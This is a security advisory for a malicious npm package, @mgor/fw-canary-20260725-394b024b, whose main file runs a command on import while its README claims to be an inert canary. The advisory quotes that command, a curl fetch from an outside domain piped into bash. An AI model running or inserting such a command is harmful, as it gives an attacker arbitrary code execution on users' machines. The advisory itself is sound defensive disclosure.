MAL-2026-12321

    Dashboard / Malicious Package / MAL-2026-12321

    MAL-2026-12321

    Published: 5 Aug 2026Last Modified: 5 Aug 2026

    Summary: Malicious code in @mgor/fw-canary-20260725-394b024b (npm)

    Details: Source: amazon-inspector (80e828a7ffd0138db85154b49b584df253be1e6509a0a4aa6475bfe317510f37) index.js, the package's declared main entry point, unconditionally executes `curl fewafw.hydege.me | /bin/bash` at top level. Any consumer that requires or imports this package fetches an unpinned, unverified shell script from a non-first-party domain and pipes it into bash, yielding arbitrary code execution on the installer's host. The package.json description and README self-label the package as an inert security-test canary with no install scripts and no functionality, directly contradicting the actual code behavior — a deceptive cover story.

    Affected packages

    Package

    Name: @mgor/fw-canary-20260725-394b024b

    Purl: pkg:npm/%40mgor/fw-canary-20260725-394b024b

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    0.0.2